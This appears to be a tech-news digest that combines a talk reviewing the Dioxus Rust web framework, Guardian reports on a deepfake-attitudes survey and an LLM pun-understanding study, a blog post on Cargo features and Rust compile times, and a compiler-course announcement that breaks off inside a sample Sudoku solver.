Please find on this diagram, in red, every Rust project funded by Huawei, or any other kind of -wei.

Huawei funding diagram — the XKCD meme where everything relies on the work of one person, except it's colored in red mostly.

Dioxus is the promise of having a single code base for your mobile apps and web apps and desktop apps. It makes me think of React Native or PhoneGap. If you’ve heard of PhoneGap , remember to stretch. It’s very important at our ages.

Dioxus “fullstack” goes one step further, with a single code base for the client and for the server. But what does that mean? How did we get here? Let’s go back in time for a minute or twelve.

A short and mostly wrong history of web apps

There’s been plenty of different paradigms when it comes to web apps, and I won’t cover them all.

In short, in the first generation, “generating HTML” is the job of the server. You are allowed to sprinkle some JavaScript (or, god forbid, Visual Basic Script) to make some stuff move, but that’s as far as it goes.

The image is a diagram illustrating the relationship between a server and a client in web rendering.
	•	The left half is blue and labeled SERVER, containing an oval labeled “render.”
	•	The right half is white and labeled CLIENT, containing an oval labeled “display.”
	•	Between them, a box labeled HTML sits in the center, with an arrow from “render” to “HTML” and another arrow from “HTML” to “display.”
	•	The diagram shows that the server renders HTML, which is then sent to and displayed by the client.
	•	There is also a small orange crab illustration in the top-right corner.

Note that I’m saying “render” in that diagram for “generating HTML”, with my apologies to people who work on Servo and Skia and whatnot. I’m just reusing the React nomenclature, sowwy.

In the second generation of web apps, the world has now written a critical mass of JavaScript. We’re starting to have something that resembles DevTools. If you remember Firebug , that was among the first. And maybe you should work on a will or something like that.

The image is a diagram showing the relationship between a server and a client in a web application using data exchange formats.
	•	The left half is blue and labeled SERVER, containing an oval labeled “databases and co.”
	•	The right half is white and labeled CLIENT, containing two stacked ovals labeled “render” and “display,” connected by a downward arrow.
	•	In the center, a box labeled XML or JSON ou whatever connects the server and client with arrows pointing from left to right.
	•	The diagram illustrates that the server provides data (e.g., XML or JSON), and the client renders and displays it.
	•	There is also a small orange crab illustration in the top-right corner.

We’re starting to get comfortable with the idea of a real application living inside of the web browser, which renders HTML based on structured data coming from the server. And then follows a decade of developers using something called “XMLHttpRequest” to send JSON around. Oh well.

We’re starting to have web apps that work offline. However, the initial loading experience is bad. Visitors have to wait for the entire app to load, then they wait for the app to do its API calls, and then for the app to render the HTML, which can take a long time: planet earth is starting to develop a collective distaste for the spinner.

And that’s not the only problem we’ll have to address for SPAs (single-page apps). We’ll have accessibility, navigation history, search engine optimization, and of course, data loading. If every component on a page does its own API request to get some data and then render, that’s a lot of requests per page.

Especially if you looked at React the wrong way and your component is doing API calls in an infinite loop, then it’s a lot, a lot, a lot of API calls. And yes, that is actually what took Cloudflare down recently.

The image is a diagram showing how server-side rendering with client-side hydration works.
	•	The left half is blue and labeled SERVER, containing an oval labeled “render.”
	•	The right half is white and labeled CLIENT, containing two stacked ovals labeled “display” and “hydration,” connected by a downward arrow.
	•	In the center, a box labeled HTML + JSON hidden somewhere connects the server and client with arrows pointing from left to right.
	•	The diagram represents a process where the server renders HTML along with embedded JSON data, which the client uses to display the page and then hydrate it for interactivity.
	•	A small orange crab illustration appears in the top-right corner.

So boom, third generation, full stack, best of both worlds. We do the render on the server like before, and we stream it to the client, which can display it as it’s being received. But alongside that rendered HTML, the server also sends the structured data that it used to render the HTML.

A practical example

Here’s a practical example. It’s a counter written in Dioxus:

# [ component ] fn Counter ( ) -> Element { let mut x = use_signal ( || 0_u64 ) ; let inc = move |_| x += 1 ; let dec = move |_| x -= 1 ; rsx ! { "{x}" button { onclick : inc , "+" } button { onclick : dec , "-" } } }

When we do the server-side rendering, we just say, okay, there is a variable x that starts at zero. It’s used in the macro RSX, and then there’s two buttons.

The two buttons do something if you click on them, but can we do something about it on the server side? No, those event handlers have to be registered on the client side. All we can do is send hints.

Here’s the HTML markup sent by the server:

<!--node-id0 --> 0 <!--#--> < button data-node-hydration =" 1,click:1 " > + </ button > < button data-node-hydration =" 2,click:1 " > + </ button >

There’s no onclick attribute on the button tags directly. There’s only information that references the structured data (that I’m not showing you here to avoid a wall of text).

So the client has the same data the server had. It’s doing the same render as the server did and then it creates a mapping between what the server sent and what the client rendered. Then it takes over the document, installing event handlers, making everything interactive, a process we call hydration.

Now the whole point of having the server stream markup is that we can show it early before the app is even loaded on the client. But what happens if we click on a button in the middle of the hydration process?

In theory, the server markup could include actual links or forms that would trigger regular browser actions. But in practice, it’s been a while since I’ve seen anybody bother doing that.

Now, what happens if during hydration the client render doesn’t match the server render? Then it can’t create a mapping and everything’s broken. I think the best case you can do here is just replace everything with the version that the client rendered, which is still pretty bad as everything would jump around.

And now what if we need data that takes some time to fetch? For example, we’re fetching from a database or an API. That’s a family of problems that the industry has been trying to solve for years. And Dioxus offers several solutions in the form of hooks:

  • try_use_context
  • use_after_suspense_resolved
  • use_callback
  • use_context
  • use_context_provider
  • use_coroutine
  • use_coroutine_handle
  • use_effect
  • use_future
  • use_hook
  • use_hook_did_run
  • use_hook_with_cleanup
  • use_route
  • use_router
  • use_navigator
  • use_memo
  • use_memo
  • use_on_unmount
  • use_reactive
  • use_resource
  • use_root_context
  • use_set_compare
  • use_set_compare_equal
  • use_signal
  • use_signal_sync
  • use_reactive!
  • use_server_future
  • use_server_cached
  • use_drop
  • use_before_render
  • use_after_render

So there’s a little something for everyone. There’s synchronous hooks. There’s asynchronous hooks. There’s reactive hooks. There’s hooks that cache the results. There are hooks that only run on the server side or only on the client side.

It’s a little bit intimidating, to be honest. We’re far from the “if it compiles it works” that I got used to, in Rust?

If you break the rules of hooks, you don’t get a build error or even a runtime error. You just get a weird behavior, which can be hard to debug.

But there’s kind of a good reason for that.

It’s that full stack stuff is complicated. It truly is. It’s not that Dioxus added complexity where we didn’t need any. It’s that this is a problem that’s inherently complex.

Love-hate

Now… I have a confession to make.

I was originally planning to be a little rough on Dioxus because I challenged myself to use it to build the quizzing software that I used at Eurorust in Paris . And that was honestly a pretty frustrating experience.

But as I dug deeper, I realized that most of my complaints were really just misunderstandings, or already in the process of being fixed in the main branch, or simply limitations of the current WebAssembly/Rust ecosystem.

I was going to start with praising the developer experience of Dioxus with their dx tool, which wraps cargo and takes care of compiling WebAssembly. I was going to praise the loading screen you see in the browser while it’s compiling everything…

What dx serve looks like

But then I was going to complain about the fact that if there’s a panic in the app, it just becomes unresponsive! There is nothing that shows you that something went wrong and the entire app is broken!

Well, in the main branch, there is! Of course they added it! It makes sense, and they are smart people using their own stuff.

Next, I was going to complain that the stack traces are completely useless because all we see are function names with numbers and hexadecimal offsets into a big WASM file.

A stacktrace where every function name is $func

But since then, I’ve found this Chrome extension called C/C++ DevTools Support (DWARF) , which looks exactly like what someone would come up with if they were trying to target me specifically with malware.

The C/C++ DevTools Support chrome extension page

And yet it works, it doesn’t actually give us the name of the functions but it does show the name of source files and lines. And if you click them they open up in DevTools, and you can place breakpoints, you can step in, step over, step out like a real debugger.

The stack traces now have rust source names and line numbers.

It’s honestly a lot better than I imagined. I didn’t even know we were so far with WASM debugging or that we had picked DWARF for that but I guess that makes sense.

The debugging experience in dev tools.

Next, I was going to complain about Subsecond, their hot patching thing.

So, what is hot patching? When you develop a web application, it’s kind of a given now because of React and Svelte and whatnot, that you should be able to modify source code that corresponds to a component and that When saving that file in your editor, the change should apply directly in your browser without changing the state of the application.

So if you’ve navigated deep into your application’s hierarchy, hot patching doesn’t reload you back to the start page. It doesn’t reload the page at all. Instead, it updates only the components that have changed on the current page.

And I thought I was using that with Dioxus and I thought, wow, it doesn’t really work well at all. It actually does lose state and it’s not actually under a second. It turns out I hadn’t enabled it. I forgot. You have to pass --hot-patch and I… didn’t know.

When I did enable it, I noticed that it worked really well. Like, well, it crashes all the time, because what it’s doing is a lot more complicated than the JavaScript framework, and it’s still early days. But the promise is here. You can make a change and see the result very quickly in your browser.

And you wanna know something funny? When you enable hotpatching, Stacktraces show the actual mangled name of Rust functions. But, it also breaks DWARF debugging, so uhhh.. your choice I guess.

Does Dioxus spark joy?

It’s time to answer the question, does Dioxus spark joy? I’m gonna say: not yet.

For now, without subsecond and everything, it’s still really unpleasant for the most part, compared to Svelte 5 which is my gold standard. But I can see what the Dioxus team is going for and I’m really excited for it.

I was kind of skeptical going into this. I was like: I’m gonna get Rust enums, which is great, but everything else is going to suck .

But I was wrong! The generational references make event handlers not actually miserable to write. Server-side functions with web sockets actually work pretty well. And get rid of a lot of boilerplate.

The Dioxus team is doing a lot of hard, interesting work. They have a Flexbox implementation that they’re sharing with Servo. They’re doing their own HTML and CSS renderer now to make desktop applications without a full-fledged web engine.

I’m very much looking forward for Dioxus and the entire WASM on the front-end ecosystem to catch up with the JavaScript-based solutions in terms of developer ergonomics.

In the meantime, I’ll be doing Rust on the backend, and TypeScript on the frontend.

Afterword

So since I gave this talk, I’ve written several thousand lines of dioxus for an upcoming project, which… made the conclusion a lie I guess. I still feel conflicted about it, but I guess I’m also invested in it now. Let’s… see where this goes!

(JavaScript is required to see this. Or maybe my stuff broke)

Did you know I also make videos? Check them out on PeerTube and also YouTube !

Here's another article just for you:

One in four unconcerned by sexual deepfakes created without consent, survey finds

Guardian
www.theguardian.com
2025-11-24 09:00:32
Senior UK police officer says AI is accelerating violence against women and girls and that technology companies are complicit One in four people think there is nothing wrong with creating and sharing sexual deepfakes, or they feel neutral about it, even when the person depicted has not consented, ac...
Original Article

One in four people think there is nothing wrong with creating and sharing sexual deepfakes, or they feel neutral about it, even when the person depicted has not consented, according to a police-commissioned survey.

The findings prompted a senior police officer to warn that the use of AI is accelerating an epidemic in violence against women and girls (VAWG), and that technology companies are complicit in this abuse.

The survey of 1,700 people commissioned by the office of the police chief scientific adviser found 13% felt there was nothing wrong with creating and sharing sexual or intimate deepfakes – digitally altered content made using AI without consent.

A further 12% felt neutral about the moral and legal acceptability of making and sharing such deepfakes.

Det Ch Supt Claire Hammond, from the national centre for VAWG and public protection, reminded the public that “sharing intimate images of someone without their consent, whether they are real images or not, is deeply violating”.

Commenting on the survey findings, she said: “The rise of AI technology is accelerating the epidemic of violence against women and girls across the world. Technology companies are complicit in this abuse and have made creating and sharing abusive material as simple as clicking a button, and they have to act now to stop it.”

She urged victims of deepfakes to report any images to the police. Hammond said: “This is a serious crime, and we will support you. No one should suffer in silence or shame.”

Creating non-consensual sexually explicit deepfakes is a criminal offence under the new Data Act.

The report, by the crime and justice consultancy Crest Advisory, found that 7% of respondents had been depicted in a sexual or intimate deepfake. Of these, only 51% had reported it to the police. Among those who told no one, the most commonly cited reasons were embarrassment and uncertainty that the offence would be treated seriously.

The data also suggested that men under 45 were likely to find it acceptable to create and share deepfakes. This group was also more likely to view pornography online and agree with misogynistic views, and feel positively towards AI. But the report said this association of age and gender with such views was weak and it called for further research to explore this apparent association.

One in 20 of the respondents admitted they had created deepfakes in the past. More than one in 10 said they would create one in the future. And two-thirds of respondents said they had seen, or might have seen, a deepfake.

The report’s author, Callyane Desroches, head of policy and strategy at Crest Advisory, warned that the creation of deepfakes was “becoming increasingly normalised as the technology to make them becomes cheaper and more accessible”.

She added: “While some deepfake content may seem harmless, the vast majority of video content is sexualised – and women are overwhelmingly the targets.

“We are deeply concerned about what our research has highlighted – that there is a cohort of young men who actively watch pornography and hold views that align with misogyny who see no harm in viewing, creating and sharing sexual deepfakes of people without their consent.”

Cally Jane Beech, an activist who campaigns for better protection for victims of deepfake abuse, said: “We live in very worrying times, the futures of our daughters (and sons) are at stake if we don’t start to take decisive action in the digital space soon.

She added: “We are looking at a whole generation of kids who grew up with no safeguards, laws or rules in place about this, and are now seeing the dark ripple effect of that freedom.

“Stopping this starts at home. Education and open conversation need to be reinforced every day if we ever stand a chance of stamping this out.”

Can’t tech a joke: AI does not understand puns, study finds

Guardian
www.theguardian.com
2025-11-24 07:59:34
Researchers say results underline large language models’ poor grasp of humour, empathy and cultural nuance Comedians who rely on clever wordplay and writers of witty headlines can rest a little easier, for the moment at least, research on AI suggests. Experts from universities in the UK and Italy ha...
Original Article

Comedians who rely on clever wordplay and writers of witty headlines can rest a little easier, for the moment at least, research on AI suggests.

Experts from universities in the UK and Italy have been investigating whether large language models (LLMs) understand puns – and found them wanting.

The team from Cardiff University , in south Wales, and Ca’ Foscari University of Venice concluded that LLMs were able to spot the structure of a pun but did not really get the joke.

An example they tested was: “I used to be a comedian, but my life became a joke.” If they replaced this with: “I used to be a comedian, but my life became chaotic,” LLMs still tended to perceive the presence of a pun.

They also tried: “Long fairy tales have a tendency to dragon.” If they replaced “dragon” with the synonym “prolong” or even a random word, LLMs seemed to believe there was a pun there.

Prof Jose Camacho Collados , of Cardiff University’s school of computer science and informatics, claimed the research suggested LLMs’ grasp of humour was fragile.

“In general, LLMs tend to memorise what they have learned in their training. As such, they catch existing puns well but that doesn’t mean they truly understand them,” he said.

“We were able to consistently fool LLMs by modifying existing puns, removing the double meaning that made the original pun. In these cases, models associate these sentences with previous puns, and make up all sort of reasons to justify they are a pun. Ultimately, we found their understanding of puns is an illusion.”

The team concluded that when faced with unfamiliar wordplay, the LLMs’ success rate in distinguishing puns from sentences without a pun can drop to 20%.

Another pun tested was: “Old LLMs never die, they just lose their attention.” When attention was changed to “ukulele”, the LLM still perceived it as a pun on the basis that “ukulele” sounded a bit like “you-kill-LLM”.

skip past newsletter promotion

The team was surprised at the creativity, but still, the LLM had not got the joke.

The researchers said the work underlined why people should be cautious when using LLMs for applications that need an understanding of humour, empathy or cultural nuance.

Their research was presented earlier this month at the 2025 Conference on Empirical Methods in Natural Language Processing, in Suzhou, China. It is detailed in a paper titled Pun unintended: LLMs and the illusion of humor understanding .

Making the case that Cargo features could be improved to alleviate Rust compile times

Lobsters
saghm.com
2025-11-24 07:22:38
Comments...
Original Article

11 min read

Two common criticisms of Rust development are the long compile times and the large number of dependencies that end up being used in projects. While people have drawn connections between these issues before, I've noticed that most discussions don't end up talking much about a specific tool that ostensibly should help mitigate this issue: Cargo features. For those not already familiar with Cargo features, I'd recommend the Rust book as an authoritative source of documentation for how they work; for those not interested in having to read something external to understand the rest of this post, here's a brief summary of how they work:

  • When creating a Rust package...
    • you can define any number of "features"
    • a feature can be tied to one or more "optional" dependencies, which will get included if the feature is enabled by downstream users and will not be included if disabled by downstream users
    • a feature can depend on other features (either from within the same package or its dependencies), which will transitively include them whenever the feature that required them is enabled
    • code inside the package can be conditionally included or excluded based on whether certain features are enabled or disabled
    • the package defines which subset of the features are enabled by default
  • When depending on a Rust package that uses features...
    • without specifying any additional details, the default set of features defined by the package will be used
    • individual features can be enabled by manually listing them in the details of a dependency configuration
    • default features can be disabled completely for a given dependency, meaning that only the individually listed features will be enabled
    • a dependency that is specified more than once (either transitively by multiple direct dependencies or both directly and transitively) using versions that are considered compatible in terms of SemVer will be "unified", which means the union of sets of specified features will be enabled
      • In case this is confusing, here's a concrete example: imagine a package called D has features called foo , bar , and baz . Package A depends directly on version 1.1.1 of D and specifies it uses the features foo and bar from it. A also depends directly on packages B and C . B depends directly on version 1.2.0 of D and uses the feature baz . Finally, C depends on version 1.5.0 of package D but doesn't specify any features. When compiling package A and its dependencies, package D will have features foo , bar , and baz enabled for all of A , B , and C

At a high level, Cargo features give package authors a way to allow users to opt into or out of parts of their package, and in an ideal world, they would make it easy to avoid having to compile code from dependencies that you don't need. For those familiar with other languages that provide similar functionality, this might be recognizable as a form of conditional compilation . It's worth noting that one of the common uses of feature flags is giving users the ability to opt out of coding using procedural macros , which often have an outsized impact on compile times. However, there are some quirks in the ways that features work that at least to me seem to get in the way of this happening in practice, and I've increasingly started to feel like they're a key piece of why the Rust ecosystem hasn't been able to improve the situation around compilation times and dependency bloat significantly.

Problems with "default-features"

In my opinion, the ergonomics around defining and using the default set of features get in the way of trying to reduce bloat and compile times. For example, by default, cargo doesn't show anything about what features are enabled in a dependency you've added. Here's an extremely contrived demonstration of how this might end up happening in a package I've defined a locally:

# my-package/Cargo.toml

[package]
name = "my-package"
version = "0.1.0"
edition = "2021"

[dependencies]
my-dependency = { path = "../my-dependency" }

It imports another package that I've defined locally alongside it as a dependency. Currently, there's absolutely no code in this package other than the dependency:

# my-package/src/main.rs

fn main() {
}

Let's compile it!

$ time cargo build
  Compiling my-dependency v0.1.0 (/home/saghm/.scratch/my-dependency)
  Compiling my-package v0.1.0 (/home/saghm/.scratch/my-package)
  Finished `dev` profile [unoptimized + debuginfo] target(s) in 3.10s

real    0m3.155s
user    0m1.929s
sys     0m1.281s

Hmm, over three seconds to build a seemingly empty package in debug mode. Let's take a look at my-dependency to see what's going on.

# my-dependency/Cargo.toml

[package]
name = "my-dependency"
version = "0.1.0"
edition = "2021"

[features]
default = ["foo"]
foo = []

[dependencies]

my-dependency has a feature called "foo". We definitely didn't make any explicit choice to include it in my-package , and the cargo build output didn't mention it at all, but it's still going to be included by default because it's in the default feature list. What does the feature do though?

# my-dependency/src/lib.rs

#[cfg(feature = "foo")]
pub static BYTES: &'static [u8] = include_bytes!("./big_file");

Whoops! Turns out someone defined a static array of 400,000 bytes of zeroes and exported it under the foo feature flag. What happens if we disable that feature in our original package?

diff --git a/Cargo.toml b/Cargo.toml
index 8e39c10..52bc348 100644
--- a/Cargo.toml
+++ b/Cargo.toml
@@ -4,4 +4,4 @@ version = "0.1.0"
 edition = "2021"

 [dependencies]
-my-dependency = { path = "../my-dependency" }
+my-dependency = { path = "../my-dependency", default-features = false }
$ cargo clean && time cargo build
     Removed 32 files, 1007.6MiB total
   Compiling my-dependency v0.1.0 (/home/saghm/.scratch/my-dependency)
   Compiling my-package v0.1.0 (/home/saghm/.scratch/my-package)
    Finished `dev` profile [unoptimized + debuginfo] target(s) in 0.20s

real    0m0.255s
user    0m0.152s
sys     0m0.107s

A fifth or a quarter of a second, depending on if you ask cargo or time . Either way, much better!

This example is obviously very silly, but at a high level, there's nothing stopping something similar from happening with real-world code because there's no obvious feedback given when using default features from dependencies.

The fact that default features can only be opted out of entirely rather than disabled individually can also be mildly annoying. If a package exposes 10 default features, and you want to disable only one of them, the only way to do this currently is to disable all default features and then manually enable the nine that you don't want to disable. (As an aside, this also means that introducing new default features won't necessarily cause all packages that depend on it to get them by default; in the previous example, increasing the number of default features to 11 would cause the above strategy to disable both the feature it previously disabled and the newly default feature. While this isn't necessarily a bad thing from the perspective of compile times, I'd still argue that this happening in a mostly hidden way to users who upgrade isn't ideal, and that this problem would be better avoided by having a more granular mechanism for disabling default features.)

Problems with transitive dependencies

It might sound like the issues with bloat from features would be mitigated by avoiding marking features as default, but there's an additional issue that would still prevent this from improving things very much. The only mechanism that currently exists for a library to expose the features of its dependencies transitively is to define its own features that each "map" to the features of its dependencies. Using the contrived example from above, my-package could define a feature that depends on the foo feature of my-dependency , and end-users of my-package could choose whether to include that feature or not. Without that, users of my-package will always end up with the exact set of features from my-package that my-package defines; either all users of my-package get the foo feature from my-dependency or none of them would. In other words, Cargo doesn't provide any way to configure the set of features included from transitive dependencies.

Imagine if you've created a library that has five dependencies, and none of those have any dependencies of their own. Not too bad compared to a lot of Rust packages! In order to do their part to combat bloat and compile times, each of those libraries define five optional features, with the idea that users of the package can avoid compiling the parts they don't need. If you don't necessarily need those features in your own library, but you happen to expose types from all five of those crates in your own API, you'd need to define twenty-five features in your own crate to give your users the option to avoid the bloat. The situation gets even worse when you consider transitive dependencies; if each of those five dependencies even had a single dependency of their own with two optional features, and they followed the same strategy of exposing these as well, you'd need to add another ten features to your package after the initial just to avoid forcing users of your own code to include code they don't need that you haven't written —on top of any features you define for users to avoid unnecessary bloat from your own code!

This is why I don't think that cleaning up the situation on how default dependencies are specified would end up being sufficient to alleviate the current situation. Even if we had a magic wand that we could wave and "fix" every library in the ecosystem to define a bunch of features to disable arbitrary code (both from themselves and mapping to the features of their dependencies), the number of transitive features that would need to be disabled transitively to actually eliminate all of the unnecessary code currently would be absolutely massive . To me, this is a fundamental flaw with what otherwise could be an effective way to reduce compile times in Rust without having to drastically change the way people use dependencies today.

What might help with these issues?

I think there are a number of possible changes that could be made that would mitigate or potentially even eliminate the issues I've described here. Some of the ideas I have would probably cause incompatibilities with the way things currently work, and while there are some existing strategies that might make them less disruptive (like tying them to a bump in the feature resolver version ), I don't have enough expertise to know the exact details of how that would work. I'm also not entirely certain that the ideas I have would even be possible to implement, or that they would actually improve the compile times and bloat rather than make them worse due to consequences that haven't occurred to me. Given all of that, I'd characterize the remainder of this post as brainstorming rather than recommendations or even realistic suggestions. If the issues I've outlined above resonate with others who read this post, hopefully smarter people than me with far more domain expertise will come up with an effective way to deal with them.

With that said, these are some of the potential mitigations for these issues I've come up with along with my extremely unscientific attempt to quantify how much I'd expect them to improve the situation, the amount effort to implement them, and my confidence that my assessment of their impact is correct:

Providing a mechanism to manually disable individual default features when specifying a dependency

  • Low impact - This wouldn't drastically improve the status quo, but it would make trying to avoid bloat slightly easier in some situations
  • Low effort - I'd expect this to be mostly straightforward to implement
  • High confidence - The scope of this change is small enough that I don't think it's likely there are drastic unintended consequences that I haven't considered (although that doesn't necessarily mean that everyone would be happy with the consequences that are intended!)

Providing a less verbose way for libraries to expose the features of their direct dependencies to other packages that depend on them directly

  • Low impact - The direct impact of this change would essentially just be ergonomic, and it would only affect packages that reexport parts of their dependencies to their own users. If this included a way to disable transitive features that aren't needed, this could potentially make a large impact in the long run, but only if enough features ended up being exposed from libraries for people to disable enough code to make a difference
  • Medium effort - At minimum, this would require augmenting the Cargo manifest format to define a way to configure this, and I don't have enough expertise in the way the feature resolver works to feel safe in assuming that this would be possible without changes there as well
  • Medium confidence - I do think there's a small chance that this might not be feasible for some reason, but I also think there's a small chance that this change could have an outsized impact in alleviating the issues; eliminating the need to account for an exponential growth in feature count makes the "magic wand" to give us a world where all existing Rust APIs are sliced into bite-sized features much more enticing, so maybe we'll be lucky and giving the ecosystem enough incentive could cause people to start working towards making that hypothetical situation a reality

Providing a way to disable features from transitive dependencies

  • Low impact - This is essentially the same as the previous idea, only configured from the package inheriting features transitively rather than the one exposing them
  • Medium effort - I wouldn't be surprised if there was some additional work compared to the previous idea around handling conflicts when someone tries to disable a transitive feature that's required by the dependency they inherit it from, but this might not end up being hard to solve in practice
  • Low confidence - Overall, I think this would end up being a messier way to achieve the same results as the previous idea. However, there's some value in allowing people to fix bloat in their own packages without requiring changes from every dependency along the transitive chain, and it's possible that I'm underestimating the magnitude of that additional value

"Zero-config" features that allow enabling/disabling code in a library without the author having to manually define it

  • High impact - This would be the "magic wand" that I mentioned a few times above. The exact impact would depend on the granularity of the features it defines, but at the extreme end, automatically defining a separate feature for every individual item that gets exposed as part of a library's API could provide away to avoid including any code that isn't used, like a compile-time version of the Unix strip utility
  • High effort - The amount of work needed to implement this would be substantial at pretty much every step of the process: designing how it should work, implementing the design, testing that it works correctly, and benchmarking the results on real-world codebases to validate that it actually helps
  • Low confidence : It's not clear to me whether this would be possible to do in a way that ended up being beneficial in practice.

Of the ideas listed here, this is definitely the most radical, so I wouldn't be surprised if some people react strongly to it. However, it's the idea that I think would have the most potential to improve things, so I think it deserves some additional elaboration on my part.

The first objection I'd expect to hear to this idea would be feasibility; it might not be obvious whether this can even be done in practice. I do think there are at least two potential ways that this would be at least possible to implement correctly: "one feature for every item in the crate" and "one feature for every module in the crate". At least from a computability perspective, it seems like it would be possible to enumerate each of these for a given library and define a corresponding feature, and then determine which (if any) of the others each of them depends on. Once that graph of feature dependencies is obtained, resolving the features that actually get used would presumably follow the same rules as resolving explicitly defined features.

The other objection I'd expect to hear is whether this would actually end up reducing compile times in practice. This concern is much harder for me to dismiss, and it's the reason I listed my confidence in the idea as "low". Any time saved by avoiding compilation of unused code would be offset by cost of having to determine how the features depend on each other, and there would be a tradeoff when deciding the amount of code in each of these features; having a larger number of "smaller" features would increase the amount of code that could be eliminated from compilation, but it would increase the amount of work needed to determine which of these features depend on each other. The amount of compilation that could be avoided could vary dramatically based on what parts of the library's API are being used, and the dependency graph of features might end up being so deep that the extra work to split into smaller features wouldn't end up eliminating more code than if a smaller set of "larger" features were picked instead.

Despite not being super confident that this would end up as a net improvement in compile times, this is still the idea I'm most interested in seeing discussed. Maybe someone will make a compelling enough argument against it that I'll change my mind, and most likely the idea won't end up going anywhere regardless of what my opinion is, but there's always a small chance that I was lucky enough to come up with a useful idea, and then we can all enjoy the benefits of having lower compile times finally.

Build a Compiler in Five Projects

Lobsters
kmicinski.com
2025-11-24 07:15:56
Comments...
Original Article

Class website here: https://kmicinski.com/cis531-f25

Are you interested in building a compiler? Learning how functional languages are implemented? Gaining a bit of practical experience with x86-64 assembly language? If so, I invite you to try your hand at the projects in my class, CIS531 . CIS531 is a masters-level class on compiler design which assumes that (a) you know how to program, (b) you’ve had some exposure to C (know about stack allocation, malloc, etc.), and (c) have seen some assembly code. My class projects are in the Racket programming language, but if you don’t know Racket, it is quite easy to learn: I have a set of YouTube video lectures that teach Racket quickly ! If you’ve never heard of Racket before, or you’re skeptical of functional programming, indulge me for a bit: there’s no hardcore FP theory or math in this course, and Racket is genuinely the best language to use for this specific setup.

My class follows Prof. Jeremy Siek’s excellent book, “Essentials of Compilation.” While I highly recommend buying the book and supporting Prof. Siek, I will also note that there are free online preliminary editions floating around; in my class, I followed the free version and suggested that students buy the book if doing so fit their goals. However, along with the book, I also have a set of class slides along with sporadic course videos, both available on the class website .

This class builds up to a compiler with the following features:

  • Variables and assignment via let
  • Integer arithmetic via + and -
  • Reading inputs / printing output
  • Booleans, conjunctions/disjunctions (and/or)
  • Branching via if , integer comparisons (<, etc.)
  • Heap-allocated vectors
  • Assignment / mutation ( set! )
  • While loops
  • Fixed-arity functions and function application
  • Lambdas (closures at runtime)

The unique combination of features lets us tour an interesting cross-section of programming languages, exploring both imperative programming with loops and mutation but also functional programming with lists and recursion.

The Projects

To be specific, I challenge you to complete five projects, each including a comprehensive test suite that will seriously stress the correctness of your implementation. p1 is a warmup project (you should skip if you already know Racket), but p2-5 build a compiler for a set of increasingly-complex languages to x86-64. The languages nest inside of each other, with p2 giving us straight-line arithmetic, p3 giving us decision trees, p4 giving us loops and mutation, and p5 giving us functions, recursion, and lambdas.

  1. p1 – Stack interpreter . This is a warmup project, if you know Racket and have some PL background, feel free to skip.

  2. p2 – Straight-line arithmetic / variables → x86-64 assembly language

  3. p3 – Booleans and branching (if, and, or) → x86-64 assembly language

  4. p4 – Vectors, heap allocation, set!, and loops → x86-64 assembly language

  5. p5 – Functions, lambdas, and closure conversion → x86-64 assembly language

The projects are designed with one key principle in mind: get us to the most expressive/fun language possible, as fast as possible . In doing this, we sacrifice a lot that might be typically covered:

  • Our languages aren’t type/memory safe, we assume the programmer is correct

  • No register allocation (possible to add, not too hard)

  • No garbage collection of any kind: we just use malloc . We could trivially support the Boehm GC (I have done that in the past), but it was another static library to link in and I really wanted to make this self contained.

  • We support a very limited set of builtins (but it is trivial to add more)

So even after project 5, getting to a “real” compiler would take a bit of effort. The most important (in my opinion) are (a) memory safety (the language needs to be safe, period) via dynamic type tagging and (b) slightly more builtins, and (c) register allocation. That would get us to a respectable compiler. After that, we could add more language features, or optimize the ones we have, e.g., by using abstract interpretation.

An Example Program

Our language will include functions, loops, branching, assignment, and even heap-allocated vectors. As an example of the power, here’s a Sudoku solver written in the language

(program
 ;; =========================
 ;; List primitives
 ;; Empty list is (void)
 ;; =========================
 (define (is_nil x) (eq? x (void)))

 ;; cons cell as 2-element vector: [0] = head, [1] = tail
 (define (cons h t)
   (let ([c (make-vector 2)])
     (let ([_ (vector-set! c 0 h)])
       (let ([_ (vector-set! c 1 t)])
         c))))

 (define (head c) (vector-ref c 0))
 (define (tail c) (vector-ref c 1))

 ;; =========================
 ;; Cell representation
 ;; cell = (row col val) as nested cons
 ;; =========================
 (define (make_cell r c v)
   (cons r (cons c (cons v (void)))))

 (define (cell_row cell)
   (head cell))

 (define (cell_col cell)
   (head (tail cell)))

 (define (cell_val cell)
   (head (tail (tail cell))))

 ;; =========================
 ;; Block indexing (0,1,2) for rows/cols
 ;; =========================
 (define (block_index3 x)
   (if (< x 3)
       0
       (if (< x 6)
           1
           2)))

 (define (same_block? r1 c1 r2 c2)
   (if (eq? (block_index3 r1) (block_index3 r2))
       (eq? (block_index3 c1) (block_index3 c2))
       #f))

 ;; =========================
 ;; Lookup current value at (row, col) in board
 ;; board is a list of cells
 ;; Return 0 if not assigned
 ;; =========================
 (define (lookup board row col)
   (if (is_nil board)
       0
       (let ([cell (head board)])
         (let ([r (cell_row cell)])
           (let ([c (cell_col cell)])
             (if (and (eq? r row) (eq? c col))
                 (cell_val cell)
                 (lookup (tail board) row col)))))))

 ;; =========================
 ;; Conflict check:
 ;; #t if some cell in board has:
 ;;   - same value, and
 ;;   - same row OR same col OR same 3x3 block
 ;; =========================
 (define (conflicts? board row col val)
   (if (is_nil board)
       #f
       (let ([cell (head board)])
         (let ([r (cell_row cell)])
           (let ([c (cell_col cell)])
             (let ([v (cell_val cell)])
               (if (and (eq? v val)
                        (or (eq? r row)
                            (or (eq? c col)
                                (same_block? r c row col))))
                   #t
                   (conflicts? (tail board) row col val))))))))

 ;; =========================
 ;; Recursive backtracking solver over (row, col)
 ;; board: list of assignments
 ;; rows, cols = 0..8
 ;; =========================
 (define (solve_cell row col board)
   (if (eq? row 9)
       ;; All rows done: solved
       board
       (if (eq? col 9)
           ;; End of row: go to next row
           (solve_cell (+ row 1) 0 board)
           ;; Otherwise, try this cell
           (let ([existing (lookup board row col)])
             (if (eq? existing 0)
                 ;; Empty cell: try values 1..9
                 (let ([candidate 1])
                   (let ([solution (void)])
                     (begin
                       (while (and (< candidate 10)
                                   (eq? solution (void)))
                              (begin
				(if (conflicts? board row col candidate)
                                    ;; conflict, skip
                                    (set! solution solution)
                                    ;; no conflict, extend board and recurse
                                    (let ([s (solve_cell row
                                                         (+ col 1)
                                                         (cons (make_cell row col candidate)
                                                               board))])
                                      (if (eq? s (void))
                                          (set! solution solution)
                                          (set! solution s))))
				(set! candidate (+ candidate 1))))
                       solution)))
                 ;; Pre-filled cell: just move on
                 (solve_cell row (+ col 1) board))))))

